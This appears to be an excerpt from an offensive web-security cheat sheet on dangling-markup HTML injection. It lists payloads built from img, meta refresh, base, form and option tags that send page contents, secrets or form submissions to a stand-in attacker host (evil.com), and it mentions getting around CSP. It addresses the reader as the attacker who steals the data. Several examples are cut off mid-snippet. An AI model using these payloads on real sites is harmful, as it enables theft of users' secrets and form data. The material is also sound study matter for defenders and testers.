<img src='http://evil.com/log.cgi?

When the page is loaded, the victim will send you all the code between the injected img tag and the next quote inside the code. If a secret is somehow located in that chunk, you will steal it (you can do the same thing using a double quote; take a look at which one could be more interesting to use).

If the img tag is forbidden (due to CSP, for example) you can also use <meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?

@import (will send all the code until it finds a ";")

<table

<base tag. All the information will be sent until the quote is closed, but it requires some user interaction (the user must click on some link, because the base tag will have changed the domain pointed to by the link):

(like <form action='update_profile.php'>) will send the data to the malicious domain.

<form action='http://evil.com/log_steal'> This will overwrite the next form header, and all the data from the form will be sent to the attacker.

<option> tag. All the data until a closing </option> is found will be sent:

<noscript></noscript> is a tag whose content will be interpreted if the browser doesn't support JavaScript (you can enable/disable JavaScript in Chrome at chrome://settings/content/javascript).

The target attribute inside the base tag will contain HTML content until the next single quote. This means that, if the link is clicked, the value of window.name will be all that HTML content. Therefore, as you control the page the victim reaches by clicking the link, you can read that window.name and exfiltrate that data:

meta http-equiv can be used to perform several actions, like setting a cookie: <meta http-equiv="Set-Cookie" Content="SESSID=1"> or performing a redirect (in 5s in this case): <meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />

(Content-Security-Policy: default-src 'self'; or Content-Security-Policy: http-equiv 'self';)

chrome://flags/#enable-portals or it won't work.